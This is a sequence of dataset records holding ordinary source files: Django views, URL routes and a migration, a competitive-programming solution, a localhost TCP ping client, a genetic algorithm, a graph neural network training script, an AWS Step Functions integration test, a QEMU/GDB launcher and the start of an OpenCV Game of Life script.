 print(e)\n\n\ndef process_metric(node_metric: dict) -> list:\n    process = ProcessGlances(node_metric)\n    datapoints = process.get_datapoints()\n    return datapoints","sub_path":"glancesapi/fetch_glances.py","file_name":"fetch_glances.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"53958351","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom pprint import pprint\nfrom django.forms.models import model_to_dict\n\nfrom models import *\n\nLOGIN_TARGET = \"trading/\"\n\n# Create your views here.\ndef index(response):\n    if \"user\" in response.session:\n        return redirect(\"/\"+LOGIN_TARGET)\n    messagelist = iter(messages.get_messages(response))\n    try:\n        header = next(messagelist)\n    except StopIteration:\n        header = \"\"\n    rest = []\n    for message in messagelist:\n        rest.append(message)\n    return render(response, \"users/index.html\", {\"header\":header, \"rest\":rest})\n\ndef register(response):\n    user, errors = User.objects.register(response.POST)\n    if user is not None:\n        messages.success(response, \"Successfully registered!\")\n        response.session[\"user\"] = {\"id\":user.id, \"name\":user.username}\n        return redirect(\"/\"+LOGIN_TARGET)\n    else:\n        messages.error(response, \"There were errors with your registration:\")\n        for error in errors:\n            messages.error(response, error)\n        return redirect(\"/\")\n\ndef login(response):\n    result = User.objects.tryLogin(response.POST[\"username\"], response.POST[\"password\"])\n    if (type(result) is User):\n        messages.success(response, \"Successfully logged in!\")\n        response.session[\"user\"] = {\"id\":result.id, \"name\":result.username}\n        return redirect(\"/\"+LOGIN_TARGET)\n    else:\n        messages.error(response, result)\n        return redirect(\"/\")\n\ndef logout(response):\n    del response.session[\"user\"]\n    return redirect(\"/\")\n","sub_path":"apps/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"650196582","text":"from pprint import pprint\ndef count(l, rows, cols):\n\tleft = [[0]*cols for i in range(rows)]\n\tright = [[0]*cols for i in range(rows)]\n\tantidiag = [[0]*cols for i in range(rows)]\n\n\tfor i in range(rows):\n\t\tfor j in range(cols):\n\t\t\tif(l[i][j] == 'z'):\n\t\t\t\tleft[i][j] = 1\n\t\t\t\tright[i][j] = 1\n\t\t\t\tantidiag[i][j] = 1\n\n\tfor i in range(rows):\n\t\tfor j in range(1, cols):\n\t\t\tif(l[i][j] == 'z'):\n\t\t\t\tleft[i][j] = left[i][j - 1] + 1\n\n\t
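# left/right/antidiag are run-length tables: for each cell they record how\n\t# many consecutive 'z' end there scanning leftwards, rightwards, and down\n\t# the anti-diagonal; the counting loop below intersects the three runs\n\t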
for i in range(rows):\n\t\tfor j in range(cols - 2, -1, -1):\n\t\t\tif(l[i][j] == 'z'):\n\t\t\t\tright[i][j] = right[i][j + 1] + 1\n\n\tfor i in range(rows - 2, -1, -1):\n\t\tfor j in range(cols - 1, 0, -1):\n\t\t\tif(l[i][j] == 'z'):\n\t\t\t\tantidiag[i][j] = antidiag[i + 1][j - 1] + 1\n\n\t# pprint(left)\n\t# pprint(right)\n\t# pprint(antidiag)\n\tans = 0\n\tfor i in range(rows):\n\t\tfor j in range(cols):\n\t\t\tif(l[i][j] == 'z'):\n\t\t\t\tk = 0\n\t\t\t\twhile(k < min(left[i][j], antidiag[i][j])):\n\t\t\t\t\tif(j - k >= 0 and i + k < rows):\n\t\t\t\t\t\tif(k < right[i + k][j - k]):\n\t\t\t\t\t\t\tans += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tk += 1\n\t\t# print(\"i = %d, j = %d, k = %d, ans = %d\"%(i, j, k, ans))\n\treturn ans\n\nif(__name__ == \"__main__\"):\n\t# rows, cols = [int(t) for t in raw_input().split(' ')]\n\trows, cols = 2000, 2000\n\tl = []\n\tfor i in range(rows):\n\t\t# l.append(raw_input())\n\t\tl.append('z' * 2000)\n\tprint(count(l, rows, cols))","sub_path":"online_judge/codeforces/628, Educational Codeforces Round 8/E. Zbazi in Zeydabad.py","file_name":"E. Zbazi in Zeydabad.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441745321","text":"import socket, sys, time\r\n\r\nTCP_IP = '127.0.0.1'\r\nPORT = 5000\r\nMESSAGE = \"ping\"\r\nBUFFER_SIZE = 1024\r\n\r\n\r\ndef client():\r\n    cnt = 0\r\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n    sock.connect((TCP_IP, PORT))\r\n    #global MESSAGE\r\n    msg = sys.argv[1] + \":\" + MESSAGE\r\n    while True:\r\n        sock.send(msg.encode())\r\n        recv_data = sock.recv(BUFFER_SIZE)\r\n        cnt += 1\r\n        print(\"Sending Data:\", MESSAGE)\r\n        print(\"Received Data:\", recv_data.decode())\r\n        time.sleep(int(sys.argv[2]))\r\n        if (cnt >= int(sys.argv[3])): \r\n            sock.close()\r\n            print('Connection Closed')\r\n            break\r\n\r\nclient()","sub_path":"TCP/tcp_client.py","file_name":"tcp_client.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"203997512","text":"from django.urls import path,re_path\nfrom django.conf.urls import url\n
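# NOTE: url() takes regex routes; each (?P<id>\d+) group below captures the\n# numeric record id that is passed to the matching view as a keyword argument\n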
from . import views\nurlpatterns=[\n    url(r'^$',views.index,name='pac_index'),\n    url('^dpp_allocation/(?P<id>\d+)/update/$',views.update_DPP_Allocation,name='dpp_allocation_update'),\n    url('^dpp_allocation/(?P<id>\d+)/delete/$',views.delete_DPP_Allocation,name='dpp_allocation_delete'),\n    url('^dpp_allocation/create/$', views.create_DPP_Allocation, name='dpp_allocation_create'),\n    url(r'^input_budget_allocation', views.input_budget_allocation, name='budget_allocation'),\n    url('^budget_allocation/(?P<id>\d+)/update/$',views.update_Budget_Allocation,name='budget_allocation_update'),\n    url('^budget_allocation/(?P<id>\d+)/delete/$',views.delete_DPP_Allocation,name='budget_allocation_delete'),\n    url('^budget_allocation/(?P<id>\d+)/list/$',views.list_budget_item_sort_by_fy,name='budget_allocation_yearwise'),\n    #Invoice Related URL\n    url('^upload_invoice_image',views.Invoice_image_upload,name='upload_invoice_image'),\n    url('^invoice_index',views.invoice_list,name='invoice_index'),\n    url('^invoice/(?P<id>\d+)/update/$',views.Edit_invoice,name='update_invoice'),\n    url('^invoice/(?P<id>\d+)/delete/$',views.Delete_invoice,name='delete_invoice'),\n    url('^invoice/add/$',views.Add_invoice,name='create_invoice'),\n    url('^invoice/(?P<id>\d+)/yearwise/$',views.list_invoices_sort_by_fy,name='invoice_yearwise'),\n\n    url('^invoice/sort/all/$',views.invoice_list_sort_by_all,name='invoice_sort'),\n\n    #Expenditure Related URL\n    url('^expenditure/(?P<id>\d+)/add/$',views.Add_Expenditure,name='create_expediture'),\n    url('^expenditure/(?P<id>\d+)/update/$',views.UpdateExpenditure,name='edit_expenditure'),\n    url('^expenditure/(?P<id>\d+)/delete/$',views.DeleteExpenditure,name='delete_expenditure'),\n    url('^expenditure_index',views.expenditure_list,name='expenditure_index'),\n    url('^expenditure/(?P<id>\d+)/list/$',views.expenditure_list_sort_by_fy,name='expenditure_yearwise'),\n    url('^expenditure/(?P<id>\d+)/invoice/$',views.expenditure_list_sort_by_invoice,name='expenditure_invoicewise'),\n    url('^expenditure/sort/all/$',views.expenditure_list_sort_by_all,name='expenditure_sort'),\n    url('^expenditure/report/$',views.progressReport,name='progress_report'),\n    #PD Dash Board for financial progress\n    url('^financial/progress/category/$',views.dashboardCategory,name=\"dashboard_category\"),\n\n]\n","sub_path":"pac/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"594255723","text":"import numpy as np\r\nimport random\r\nimport math\r\nimport copy\r\nimport matplotlib.pyplot as plt\r\nclass Ind():\r\n    def __init__(self):\r\n        self.fitness = 0\r\n        self.x = np.zeros(20)\r\n        self.place = 0\r\n        self.x1 = 0\r\n        self.x2 = 0\r\n\r\ndef Cal_fit(x, upper, lower): # decode the 20-bit chromosome and evaluate its fitness\r\n    Temp1 = 0\r\n    for i in range(10):\r\n        Temp1 += x[i] * math.pow(2, i)\r\n    Temp2 = 0\r\n    for i in range(10, 20, 1):\r\n        Temp2 += math.pow(2, i - 10) * x[i]\r\n    x1 = lower[0] + Temp1 * (upper[0] - lower[0])/(math.pow(2, 10) - 1)\r\n    x2 = lower[1] + Temp2 * (upper[1] - lower[1])/(math.pow(2, 10) - 1)\r\n    if x1 > upper[0]:\r\n        x1 = random.uniform(lower[0], upper[0])\r\n    if x2 > upper[1]:\r\n        x2 = random.uniform(lower[1], upper[1])\r\n    # objective: the two-variable six-hump camel-back test function\r\n    return 4*x1**2-2.1*x1**4+(1/3)*x1**6+x1*x2-4*x2**2+4*x2**4\r\n\r\n\r\ndef Init(G, upper, lower, Pop): # population initialisation\r\n    for i in range(Pop):\r\n        for j in range(20):\r\n            G[i].x[j] = random.randint(0, 1)\r\n        G[i].fitness = Cal_fit(G[i].x, upper, lower)\r\n        G[i].place = i\r\n
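# Find_Best returns a deep copy of the fittest individual, so later in-place\r\n# changes to the population cannot corrupt the saved best\r\n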
def Find_Best(G, Pop):\r\n    Temp = copy.deepcopy(G[0])\r\n    for i in range(1, Pop, 1):\r\n        if G[i].fitness > Temp.fitness:\r\n            Temp = copy.deepcopy(G[i])\r\n    return Temp\r\n\r\ndef Selection(G, Gparent, Pop, Ppool): # roulette-wheel selection\r\n    fit_sum = np.zeros(Pop)\r\n    fit_sum[0] = G[0].fitness\r\n    for i in range(1, Pop, 1):\r\n        fit_sum[i] = G[i].fitness + fit_sum[i - 1]\r\n    fit_sum = fit_sum/fit_sum.max()\r\n    for i in range(Ppool):\r\n        rate = random.random()\r\n        Gparent[i] = copy.deepcopy(G[np.where(fit_sum > rate)[0][0]])\r\n\r\ndef Cross_and_Mutation(Gparent, Gchild, Pc, Pm, upper, lower, Pop, Ppool): # crossover and mutation\r\n    for i in range(Ppool):\r\n        place = random.sample([_ for _ in range(Ppool)], 2)\r\n        parent1 = copy.deepcopy(Gparent[place[0]])\r\n        parent2 = copy.deepcopy(Gparent[place[1]])\r\n        parent3 = copy.deepcopy(parent2)\r\n        if random.random() < Pc:\r\n            # swap either the middle segment or the two outer segments\r\n            num = random.sample([_ for _ in range(1, 19, 1)], 2)\r\n            num.sort()\r\n            if random.random() < 0.5:\r\n                for j in range(num[0], num[1], 1):\r\n                    parent2.x[j] = parent1.x[j]\r\n            else:\r\n                for j in range(0, num[0], 1):\r\n                    parent2.x[j] = parent1.x[j]\r\n                for j in range(num[1], 20, 1):\r\n                    parent2.x[j] = parent1.x[j]\r\n            num = random.sample([_ for _ in range(1, 19, 1)], 2)\r\n            num.sort()\r\n            if random.random() < 0.5:\r\n                for j in range(num[0], num[1], 1):\r\n                    parent1.x[j] = parent3.x[j]\r\n            else:\r\n                for j in range(0, num[0], 1):\r\n                    parent1.x[j] = parent3.x[j]\r\n                for j in range(num[1], 20, 1):\r\n                    parent1.x[j] = parent3.x[j]\r\n        for j in range(20):\r\n            if random.random() < Pm:\r\n                parent1.x[j] = (parent1.x[j] + 1) % 2\r\n            if random.random() < Pm:\r\n                parent2.x[j] = (parent2.x[j] + 1) % 2\r\n\r\n        parent1.fitness = Cal_fit(parent1.x, upper, lower)\r\n        parent2.fitness = Cal_fit(parent2.x, upper, lower)\r\n        Gchild[2 * i] = copy.deepcopy(parent1)\r\n        Gchild[2 * i + 1] = copy.deepcopy(parent2)\r\n\r\ndef Choose_next(G, Gchild, Gsum, Pop): # survivor selection for the next generation\r\n    for i in range(Pop):\r\n        # parents fill the first half of Gsum, children the second half\r\n        Gsum[i] = copy.deepcopy(G[i])\r\n        Gsum[Pop + i] = copy.deepcopy(Gchild[i])\r\n    Gsum = sorted(Gsum, key = lambda x: x.fitness, reverse = True)\r\n    for i in range(Pop):\r\n        G[i] = copy.deepcopy(Gsum[i])\r\n        G[i].place = i\r\n\r\ndef Decode(x): # decode a chromosome into (x1, x2)\r\n    Temp1 = 0\r\n    for i in range(10):\r\n        Temp1 += x[i] * math.pow(2, i)\r\n    Temp2 = 0\r\n    for i in range(10, 20, 1):\r\n        Temp2 += math.pow(2, i - 10) * x[i]\r\n    x1 = lower[0] + Temp1 * (upper[0] - lower[0]) / (math.pow(2, 10) - 1)\r\n    x2 = lower[1] + Temp2 * (upper[1] - lower[1]) / (math.pow(2, 10) - 1)\r\n    if x1 > upper[0]:\r\n        x1 = random.uniform(lower[0], upper[0])\r\n    if x2 > upper[1]:\r\n        x2 = random.uniform(lower[1], upper[1])\r\n    return x1, x2\r\n\r\ndef Self_Learn(Best, upper, lower, sPm, sLearn): # self-learning (local hill-climbing) step\r\n    num = 0\r\n    Temp = copy.deepcopy(Best)\r\n    while True:\r\n        num += 1\r\n        for j in range(20):\r\n            if random.random() < sPm:\r\n                Temp.x[j] = (Temp.x[j] + 1)%2\r\n        Temp.fitness = Cal_fit(Temp.x, upper, lower)\r\n        if Temp.fitness > Best.fitness:\r\n            Best = copy.deepcopy(Temp)\r\n            num = 0\r\n        if num > sLearn:\r\n            break\r\n    return Best\r\n\r\nif __name__ == '__main__':\r\n    upper = [5,5]\r\n    lower = [-5,-5]\r\n    Pop = 100\r\n    Ppool = 50\r\n    G_max = 300\r\n    Pc = 0.9\r\n    Pm = 0.15\r\n    sPm = 0.05\r\n    sLearn = 20\r\n    G = np.array([Ind() for _ in range(Pop)])\r\n    Gparent = np.array([Ind() for _ in range(Ppool)])\r\n    Gchild = np.array([Ind() for _ in range(Pop)])\r\n    Gsum = np.array([Ind() for _ in range(Pop * 2)])\r\n    Init(G, upper, lower, Pop) # initialise the population\r\n    Best = Find_Best(G, Pop)\r\n    Y=[]\r\n    
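# main generational loop: roulette selection, segment-swap crossover with\r\n    # bit-flip mutation, (mu+lambda) survivor selection, elitist re-insertion\r\n    # of the incumbent best, then a bit-flip hill-climb on that best\r\n    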
for k in range(G_max):\r\n        Selection(G, Gparent, Pop, Ppool) # roulette-wheel selection of 50% of the population as parents\r\n        Cross_and_Mutation(Gparent, Gchild, Pc, Pm, upper, lower, Pop, Ppool) # crossover and mutation create the offspring\r\n        Choose_next(G, Gchild, Gsum, Pop) # keep the better individuals from parents plus offspring\r\n        Cbest = Find_Best(G, Pop)\r\n        if Best.fitness < Cbest.fitness:\r\n            Best = copy.deepcopy(Cbest) # update the incumbent best\r\n        else:\r\n            G[Cbest.place] = copy.deepcopy(Best)\r\n        Best = Self_Learn(Best, upper, lower, sPm, sLearn)\r\n        Y.append(Best.fitness)\r\n        print(Best.fitness)\r\n    x1, x2 = Decode(Best.x)\r\n    print(Best.x)\r\n    print([x1, x2])\r\n    X = list(range(G_max))\r\n    plt.plot(X,Y)\r\n    plt.show()","sub_path":"Test_Function/GA.function3.py","file_name":"GA.function3.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"23817231","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\nfrom model import GCN\nimport torch.nn.functional as F\nimport time\nfrom utils import load_data, accuracy\nfrom operator import itemgetter\n\n# Training settings\nparser = argparse.ArgumentParser()\nparser.add_argument('--no-cuda', action='store_true', default=False,\n                    help='Disables CUDA training.')\nparser.add_argument('--fastmode', action='store_true', default=False,\n                    help='Validate during training pass.')\nparser.add_argument('--seed', type=int, default=42, help='Random seed.')\nparser.add_argument('--epochs', type=int, default=200,\n                    help='Number of epochs to train.')\nparser.add_argument('--lr', type=float, default=0.01,\n                    help='Initial learning rate.')\nparser.add_argument('--weight_decay', type=float, default=5e-4,\n                    help='Weight decay (L2 loss on parameters).')\nparser.add_argument('--hidden', type=int, default=148,\n                    help='Number of hidden units.')\nparser.add_argument('--dropout', type=float, default=0.5,\n                    help='Dropout rate (1 - keep probability).')\n\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nif args.cuda:\n    torch.cuda.manual_seed(args.seed)\n\n# Load data\nadj, features, labels, train_idx, test_idx = load_data()\n\n# Model and optimizer\nmodel = GCN(nfeat=148,\n            nhid=args.hidden,\n            nclass=3,\n            dropout=args.dropout)\noptimizer = optim.Adam(model.parameters(),\n                       lr=args.lr, weight_decay=args.weight_decay)\n\nif args.cuda:\n    model.cuda()\n    for i in range(len(features)):\n        features[i] = features[i].cuda()\n        adj[i] = adj[i].cuda()\n        labels[i] = labels[i].cuda()\n\n\ndef train(epoch, train_idx):\n    t = time.time()\n    model.train()\n    optimizer.zero_grad()\n\n    loss = torch.FloatTensor([0]).cuda()\n    out_list = []\n    for i in train_idx:\n        x = features[i]\n        a = adj[i]\n        dx = labels[i]\n        output = model(x, a)\n        out_list.append(output)\n        loss.add_(F.nll_loss(output, dx))\n\n    acc_train = accuracy(out_list, itemgetter(*train_idx)(labels))\n    if epoch%10 == 0:\n        print(\"Train Accuracy\", acc_train)\n    loss.backward()\n    optimizer.step()\n    # print('loss: {}'.format(loss.data))\n\n    # if not args.fastmode:\n    #     # Evaluate validation set performance separately,\n    #     # deactivates dropout during validation run.\n    #     model.eval()\n    #     output = model(features, adj)\n\n    #     loss_val = F.nll_loss(output[idx_val], labels[idx_val])\n    #     acc_val = accuracy(output[idx_val], labels[idx_val])\n    #     print('Epoch: {:04d}'.format(epoch+1),\n    #           'loss_train: {:.4f}'.format(loss_train.item()),\n    #           'acc_train: {:.4f}'.format(acc_train.item()),\n    #           'loss_val: 
{:.4f}'.format(loss_val.item()),\n # 'acc_val: {:.4f}'.format(acc_val.item()),\n # 'time: {:.4f}s'.format(time.time() - t))\n\n\ndef test(idx_test):\n model.eval()\n output = []\n for i in idx_test:\n output.append(model(features[i], adj[i]))\n\n acc_test = accuracy(output, itemgetter(*idx_test)(labels))\n print(\"Test set results:\",\n \"accuracy= {:.4f}\".format(acc_test.item()))\n\n\n# Train model\nt_total = time.time()\nfor i in range(0, len(test_idx)):\n for epoch in range(args.epochs):\n train(epoch, train_idx[i])\n test(test_idx[i])\nprint(\"Optimization Finished!\")\nprint(\"Total time elapsed: {:.4f}s\".format(time.time() - t_total))","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"322586339","text":"import json\nimport logging\nimport os\nfrom time import sleep\nfrom typing import Dict\nfrom unittest import TestCase\nfrom uuid import uuid4\n\nimport boto3\nfrom botocore.client import BaseClient\n\n\"\"\"\nMake sure env variable AWS_SAM_STACK_NAME exists with the name of the stack we are going to test. \n\"\"\"\n\nclass TestStateMachine(TestCase):\n \"\"\"\n This integration test will execute the step function and verify that State Machine can process a mock Glue job execution.\n \"\"\"\n\n state_machine_arn: str\n client: BaseClient\n\n @classmethod\n def get_and_verify_stack_name(cls) -> str:\n stack_name = os.environ.get(\"AWS_SAM_STACK_NAME\")\n if not stack_name:\n raise Exception(\n \"Cannot find env var AWS_SAM_STACK_NAME. \\n\"\n \"Please setup this environment variable with the stack name where we are running integration tests.\"\n )\n\n # Verify stack exists\n client = boto3.client(\"cloudformation\")\n try:\n client.describe_stacks(StackName=stack_name)\n except Exception as e:\n raise Exception(\n f\"Cannot find stack {stack_name}. 
\\n\" f'Please make sure stack with the name \"{stack_name}\" exists.'\n ) from e\n\n return stack_name\n\n @classmethod\n def setUpClass(cls) -> None:\n \"\"\"\n Based on the provided env variable AWS_SAM_STACK_NAME,\n here we use cloudformation API to find out:\n - StateMachine's ARN\n \"\"\"\n stack_name = TestStateMachine.get_and_verify_stack_name()\n\n client = boto3.client(\"cloudformation\")\n response = client.list_stack_resources(StackName=stack_name)\n resources = response[\"StackResourceSummaries\"]\n state_machine_resources = [\n resource for resource in resources if resource[\"LogicalResourceId\"] == \"StateMachine\"\n ]\n if not state_machine_resources:\n raise Exception(\"Cannot find StateMachine\")\n\n cls.state_machine_arn = state_machine_resources[0][\"PhysicalResourceId\"]\n\n def setUp(self) -> None:\n self.client = boto3.client(\"stepfunctions\")\n\n def tearDown(self) -> None:\n \"\"\"\n Delete appropriate resources as necessary\n \"\"\"\n pass\n\n def _start_execute(self) -> str:\n \"\"\"\n Start the state machine execution request and record the execution ARN\n \"\"\"\n response = self.client.start_execution(\n stateMachineArn=self.state_machine_arn, name=f\"integ-test-{uuid4()}\", input=\"{}\"\n )\n return response[\"executionArn\"]\n\n def _wait_execution(self, execution_arn: str):\n while True:\n response = self.client.describe_execution(executionArn=execution_arn)\n status = response[\"status\"]\n if status == \"SUCCEEDED\":\n logging.info(f\"Execution {execution_arn} completely successfully.\")\n break\n elif status == \"RUNNING\":\n logging.info(f\"Execution {execution_arn} is still running, waiting\")\n sleep(3)\n else:\n self.fail(f\"Execution {execution_arn} failed with status {status}\")\n\n def test_state_machine(self):\n execution_arn = self._start_execute()\n self._wait_execution(execution_arn)\n response = self.client.describe_execution(\n executionArn=execution_arn\n )\n output = json.loads(response[\"output\"])\n assert output[\"message\"] == \"successful glue job execution\"\n","sub_path":"python3.9/step-func-etl/{{cookiecutter.project_name}}/tests/integration/test_state_machine.py","file_name":"test_state_machine.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"578954225","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pycupid', '0007_auto_20160516_1758'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='people',\n name='img_loc',\n field=models.URLField(default='https://res.cloudinary.com/hiwpdsflr/image/upload/v1463435086/jfo4xgixtukhkzhbuymt.jpg'),\n ),\n migrations.AlterField(\n model_name='people',\n name='ukey',\n field=models.UUIDField(help_text='The unique id we use to differentiate users in links in the welcome email.', editable=False, null=True, default='c9ccfebbf5e0426ba9edd32ce2866ff7'),\n ),\n ]\n","sub_path":"apps/pycupid/migrations/0008_auto_20160516_1801.py","file_name":"0008_auto_20160516_1801.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388079096","text":"import itertools\nimport os\nimport shlex\nimport shutil\nimport signal\nimport subprocess\nimport time\nimport os\n\nFIRST_UID = 1000\n\n\n# Reserve 10 ports for each user starting from 24000\ndef gdb_port():\n return 24000 + 
(os.getuid() - FIRST_UID) * 10\n\n\ndef uart_port(num):\n assert num >= 0 and num < 9\n return gdb_port() + 1 + num\n\n\nCONFIG = {\n 'board': 'malta',\n 'config': {\n 'debug': False,\n 'graphics': False,\n 'elf': 'sys/mimiker.elf',\n 'initrd': 'initrd.cpio',\n 'args': [],\n 'board': {\n 'malta': {\n 'kernel': 'sys/mimiker.elf',\n },\n 'rpi3': {\n 'kernel': 'sys/mimiker.img.gz',\n },\n },\n },\n 'qemu': {\n 'options': [\n '-nodefaults',\n '-icount', 'shift=3,sleep=on',\n '-kernel', '{kernel}',\n '-initrd', '{initrd}',\n '-gdb', 'tcp:127.0.0.1:{},server,wait'.format(gdb_port()),\n '-serial', 'none'],\n 'board': {\n 'malta': {\n 'binary': 'qemu-mimiker-mipsel',\n 'options': [\n '-device', 'VGA',\n '-device', 'rtl8139',\n '-machine', 'malta',\n '-cpu', '24Kf'],\n 'uarts': [\n dict(name='/dev/tty1', port=uart_port(0), raw=True),\n dict(name='/dev/tty2', port=uart_port(1)),\n dict(name='/dev/cons', port=uart_port(2))\n ]\n },\n 'rpi3': {\n 'binary': 'qemu-mimiker-aarch64',\n 'options': [\n '-machine', 'raspi3',\n '-smp', '4',\n '-cpu', 'cortex-a53'],\n 'uarts': [\n dict(name='/dev/cons', port=uart_port(0))\n ]\n }\n }\n },\n 'gdb': {\n 'pre-options': [\n '-n',\n '-ex=set confirm no',\n '-iex=set auto-load safe-path {}/'.format(os.getcwd()),\n '-ex=set tcp connect-timeout 30',\n '-ex=target remote localhost:{}'.format(gdb_port()),\n '--silent',\n ],\n 'extra-options': [],\n 'post-options': [\n '-ex=set confirm yes',\n '-ex=source .gdbinit',\n '-ex=continue',\n '{elf}'\n ],\n 'board': {\n 'malta': {\n 'binary': 'mipsel-mimiker-elf-gdb'\n },\n 'rpi3': {\n 'binary': 'aarch64-mimiker-elf-gdb'\n }\n }\n }\n}\n\n\ndef setboard(name):\n setvar('board', name)\n # go over top-level configuration variables\n for top, config in CONFIG.items():\n if type(config) is not dict:\n continue\n board = getvar('board.' 
+ name, start=config, failok=True)\n if not board:\n continue\n # merge board variables into generic set\n for key, value in board.items():\n if key not in config:\n config[key] = value\n elif type(value) == list:\n config[key].extend(value)\n else:\n raise RuntimeError(f'Cannot merge {top}.board.{name}.{key} '\n f'into {top}')\n # finish merging by removing alternative configurations\n del config['board']\n\n\ndef getvar(name, start=CONFIG, failok=False):\n value = start\n for f in name.split('.'):\n try:\n value = value[f]\n except KeyError as ex:\n if failok:\n return None\n raise ex\n return value\n\n\ndef setvar(name, val, config=CONFIG):\n fs = name.split('.')\n while len(fs) > 1:\n config = config[fs.pop(0)]\n config[fs.pop(0)] = val\n\n\ndef getopts(*names):\n opts = itertools.chain.from_iterable([getvar(name) for name in names])\n return [opt.format(**getvar('config')) for opt in opts]\n\n\nclass Launchable():\n def __init__(self, name, cmd):\n self.name = name\n self.cmd = cmd\n self.window = None\n self.process = None\n self.pid = None\n self.options = []\n\n def start(self, session):\n cmd = ' '.join([self.cmd] + list(map(shlex.quote, self.options)))\n self.window = session.new_window(\n attach=False, window_name=self.name, window_shell=cmd)\n self.pid = int(self.window.attached_pane._info['pane_pid'])\n\n def run(self):\n self.process = subprocess.Popen([self.cmd] + self.options,\n start_new_session=False)\n\n # Returns true iff the process terminated\n def wait(self, timeout=None):\n if self.process is None:\n return False\n # Throws exception on timeout\n self.process.wait(timeout)\n self.process = None\n return True\n\n def stop(self):\n if self.process is not None:\n try:\n # Give it a chance to exit gracefuly.\n self.process.send_signal(signal.SIGTERM)\n try:\n self.process.wait(0.2)\n except subprocess.TimeoutExpired:\n self.process.send_signal(signal.SIGKILL)\n except ProcessLookupError:\n # Process already quit.\n pass\n self.process = None\n\n if self.pid is not None:\n time.sleep(0.2)\n try:\n os.kill(self.pid, signal.SIGKILL)\n except ProcessLookupError:\n # Process has already quit!\n pass\n self.pid = None\n\n def interrupt(self):\n if self.process is not None:\n self.process.send_signal(signal.SIGINT)\n\n @staticmethod\n def wait_any(launchables):\n for l in itertools.cycle(launchables):\n try:\n if l.wait(0.2):\n break\n except subprocess.TimeoutExpired:\n continue\n\n\nclass QEMU(Launchable):\n def __init__(self):\n super().__init__('qemu', getvar('qemu.binary'))\n\n self.options = getopts('qemu.options')\n for uart in getvar('qemu.uarts'):\n port = uart['port']\n self.options += ['-serial', f'tcp:127.0.0.1:{port},server,wait']\n\n if getvar('config.args'):\n self.options += ['-append', ' '.join(getvar('config.args'))]\n if getvar('config.debug'):\n self.options += ['-S']\n if not getvar('config.graphics'):\n self.options += ['-display', 'none']\n\n\nclass GDB(Launchable):\n def __init__(self, name=None, cmd=None):\n super().__init__(name or 'gdb', cmd or getvar('gdb.binary'))\n # gdbtui & cgdb output is garbled if there is no delay\n self.cmd = 'sleep 0.25 && ' + self.cmd\n\n if self.name == 'gdb':\n self.options += ['-ex=set prompt \\033[35;1m(gdb) \\033[0m']\n self.options += getopts(\n 'gdb.pre-options', 'gdb.extra-options', 'gdb.post-options')\n\n\nclass GDBTUI(GDB):\n def __init__(self):\n super().__init__('gdbtui')\n self.options = ['-tui']\n\n\nclass CGDB(GDB):\n def __init__(self):\n super().__init__('cgdb', 'cgdb')\n self.options = ['-d', 
getvar('gdb.binary')]\n\n\nclass SOCAT(Launchable):\n    def __init__(self, name, tcp_port, raw=False):\n        super().__init__(name, 'socat')\n        # The simulator will only open the server after some time has\n        # passed. To minimize the delay, keep reconnecting until success.\n        stdio_opt = 'STDIO'\n        if raw:\n            stdio_opt += ',cfmakeraw'\n        self.options = [stdio_opt, f'tcp:localhost:{tcp_port},retry,forever']\n\n\nDebuggers = {'gdb': GDB, 'gdbtui': GDBTUI, 'cgdb': CGDB}\n__all__ = ['Launchable', 'QEMU', 'GDB', 'CGDB', 'GDBTUI', 'SOCAT', 'Debuggers',\n           'gdb_port', 'uart_port', 'getvar', 'setvar', 'setboard']\n","sub_path":"launcher/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"212227989","text":"#!/usr/bin/python\r\n\r\n\r\nimport numpy\r\nimport sys\r\n\r\nimport cv2.cv as cv\r\n\r\n\r\ndef game_of_life():\r\n    \"\"\"Capture images with a webcam, binarize them\r\n    and run Conway's game of life on it.\"\"\"\r\n    if len(sys.argv) == 1:\r\n        capture = cv.CreateCameraCapture(0)\r\n    elif len(sys.argv) == 2 and sys.argv[1].isdigit():\r\n        capture = cv.CreateCameraCapture(int(sys.argv[1]))\r\n    elif len(sys.argv) == 2:\r\n        capture = cv.CreateFileCapture(sys.argv[1])\r\n\r\n    if not capture:\r\n        sys.exit(\"Can not initialize capturing...\")\r\n\r\n    capture_window_name = \"Hit any key to snap or escape to quit.\"\r\n    binary_window_name = \"binary\"\r\n    snap_window_name = \"snap\"\r\n    gol_window_name = \"GoL\"\r\n    cv.NamedWindow(capture_window_name, 